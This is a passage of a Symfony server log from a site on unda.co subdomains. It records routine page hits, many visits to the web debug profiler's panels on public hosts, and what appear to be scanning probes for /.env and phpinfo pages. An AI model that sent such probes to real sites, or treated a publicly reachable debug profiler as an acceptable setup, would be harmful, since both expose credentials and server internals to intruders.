  6672. [2025-12-20 09:03:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  6673. [2025-12-20 09:05:00] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  6674. [2025-12-20 09:05:01] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  6675. [2025-12-20 09:06:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"eae15b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/eae15b?panel=cache","method":"GET"} []
  6676. [2025-12-20 09:06:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  6677. [2025-12-20 09:14:54] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  6678. [2025-12-20 09:15:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fbcff2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fbcff2","method":"GET"} []
  6679. [2025-12-20 09:15:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  6680. [2025-12-20 09:15:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fbcff2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fbcff2?panel=twig","method":"GET"} []
  6681. [2025-12-20 09:15:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  6682. [2025-12-20 09:15:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fbcff2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fbcff2?panel=cache","method":"GET"} []
  6683. [2025-12-20 09:15:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  6684. [2025-12-20 09:17:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=35.198.60.231&limit=10","method":"GET"} []
  6685. [2025-12-20 09:17:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=35.198.60.231&limit=10","method":"GET"} []
  6686. [2025-12-20 09:19:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=cache","method":"GET"} []
  6687. [2025-12-20 09:19:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  6688. [2025-12-20 09:21:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f44717","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/f44717?panel=dump","method":"GET"} []
  6689. [2025-12-20 09:21:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  6690. [2025-12-20 09:23:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=cache","method":"GET"} []
  6691. [2025-12-20 09:23:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  6692. [2025-12-20 09:28:27] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"OPTIONS"} []
  6693. [2025-12-20 09:29:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7a2d62","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7a2d62?panel=router","method":"GET"} []
  6694. [2025-12-20 09:29:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  6695. [2025-12-20 09:30:28] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  6696. [2025-12-20 09:34:42] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  6697. [2025-12-20 09:40:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fbcff2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fbcff2?panel=security","method":"GET"} []
  6698. [2025-12-20 09:40:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  6699. [2025-12-20 09:44:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6700. [2025-12-20 09:44:21] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  6701. [2025-12-20 09:44:46] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
  6702. [2025-12-20 09:45:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"eae15b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/eae15b","method":"GET"} []
  6703. [2025-12-20 09:45:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  6704. [2025-12-20 09:46:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9b6635","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9b6635?panel=request","method":"GET"} []
  6705. [2025-12-20 09:46:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  6706. [2025-12-20 09:52:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=time","method":"GET"} []
  6707. [2025-12-20 09:52:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  6708. [2025-12-20 09:53:41] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  6709. [2025-12-20 09:59:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"15095c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/15095c?panel=config","method":"GET"} []
  6710. [2025-12-20 09:59:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  6711. [2025-12-20 10:00:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1702ec","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/1702ec?panel=db","method":"GET"} []
  6712. [2025-12-20 10:00:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  6713. [2025-12-20 10:02:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"6618a5","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/6618a5?panel=exception","method":"GET"} []
  6714. [2025-12-20 10:02:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  6715. [2025-12-20 10:05:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=cache","method":"GET"} []
  6716. [2025-12-20 10:05:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  6717. [2025-12-20 10:07:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"130ea7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/130ea7?panel=twig","method":"GET"} []
  6718. [2025-12-20 10:07:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  6719. [2025-12-20 10:08:40] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  6720. [2025-12-20 10:08:40] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  6721. [2025-12-20 10:13:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"15095c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/15095c?panel=cache","method":"GET"} []
  6722. [2025-12-20 10:13:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  6723. [2025-12-20 10:19:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"130ea7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/130ea7?panel=config","method":"GET"} []
  6724. [2025-12-20 10:19:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  6725. [2025-12-20 10:23:53] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  6726. [2025-12-20 10:23:53] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6727. [2025-12-20 10:23:53] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6728. [2025-12-20 10:23:53] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6729. [2025-12-20 10:23:53] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6730. [2025-12-20 10:23:53] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6731. [2025-12-20 10:23:53] security.DEBUG: Calling Authentication entry point. [] []
  6732. [2025-12-20 10:23:53] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  6733. [2025-12-20 10:23:54] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6734. [2025-12-20 10:23:54] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6735. [2025-12-20 10:23:54] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6736. [2025-12-20 10:23:54] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6737. [2025-12-20 10:23:54] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6738. [2025-12-20 10:23:54] security.DEBUG: Calling Authentication entry point. [] []
  6739. [2025-12-20 10:23:54] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
  6740. [2025-12-20 10:23:54] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6741. [2025-12-20 10:23:54] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6742. [2025-12-20 10:23:54] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6743. [2025-12-20 10:23:54] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6744. [2025-12-20 10:23:54] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6745. [2025-12-20 10:23:54] security.DEBUG: Calling Authentication entry point. [] []
  6746. [2025-12-20 10:23:55] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
  6747. [2025-12-20 10:23:55] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6748. [2025-12-20 10:23:55] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6749. [2025-12-20 10:23:55] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6750. [2025-12-20 10:23:55] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6751. [2025-12-20 10:23:55] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6752. [2025-12-20 10:23:55] security.DEBUG: Calling Authentication entry point. [] []
  6753. [2025-12-20 10:23:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6754. [2025-12-20 10:24:00] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  6755. [2025-12-20 10:24:00] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6756. [2025-12-20 10:24:00] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6757. [2025-12-20 10:24:00] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6758. [2025-12-20 10:24:00] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6759. [2025-12-20 10:24:00] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6760. [2025-12-20 10:24:00] security.DEBUG: Calling Authentication entry point. [] []
  6761. [2025-12-20 10:24:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6762. [2025-12-20 10:24:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6763. [2025-12-20 10:24:07] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  6764. [2025-12-20 10:24:07] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6765. [2025-12-20 10:24:07] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6766. [2025-12-20 10:24:07] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6767. [2025-12-20 10:24:07] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6768. [2025-12-20 10:24:07] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6769. [2025-12-20 10:24:07] security.DEBUG: Calling Authentication entry point. [] []
  6770. [2025-12-20 10:24:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6771. [2025-12-20 10:24:12] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
  6772. [2025-12-20 10:24:12] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6773. [2025-12-20 10:24:12] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6774. [2025-12-20 10:24:12] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6775. [2025-12-20 10:24:12] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6776. [2025-12-20 10:24:12] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6777. [2025-12-20 10:24:12] security.DEBUG: Calling Authentication entry point. [] []
  6778. [2025-12-20 10:24:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6779. [2025-12-20 10:24:18] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  6780. [2025-12-20 10:24:18] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6781. [2025-12-20 10:24:18] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6782. [2025-12-20 10:24:18] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6783. [2025-12-20 10:24:18] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6784. [2025-12-20 10:24:18] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6785. [2025-12-20 10:24:18] security.DEBUG: Calling Authentication entry point. [] []
  6786. [2025-12-20 10:24:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6787. [2025-12-20 10:25:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f3fa8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f3fa8?panel=db","method":"GET"} []
  6788. [2025-12-20 10:25:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  6789. [2025-12-20 10:26:24] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  6790. [2025-12-20 10:26:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"15095c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/15095c","method":"GET"} []
